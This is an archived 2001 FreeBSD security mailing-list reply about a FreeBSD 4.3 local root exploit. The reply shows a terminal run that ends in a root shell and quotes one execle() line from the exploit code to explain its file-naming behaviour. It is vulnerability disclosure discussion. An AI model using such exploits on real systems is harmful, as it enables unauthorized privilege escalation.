Skip site navigation (1)Skip section navigation (2)
Date:      Thu, 12 Jul 2001 19:34:43 +0200
From:      "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl>
To:        "Jason DiCioccio" <jdicioccio@epylon.com>
Cc:        <security@freebsd.org>
Subject:   Re: FreeBSD 4.3 local root
Message-ID:  <088501c10af8$f06bd350$2001a8c0@clitoris>
References:  <657B20E93E93D4118F9700D0B73CE3EA02FFEFB7@goofy.epylon.lan>

next in thread | previous in thread | raw e-mail | index | archive | help
> is the binary named 'vv' ?
> It has to be.

As I said, no it hasn't.

riget:venglin:~> ./dupa
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe4a
child=83578
Password:done

# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)

Thats because execl() calls argv[0]:

[...]
if(!execle(av[0],"vv",NULL,environ))
[...]

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?088501c10af8$f06bd350$2001a8c0>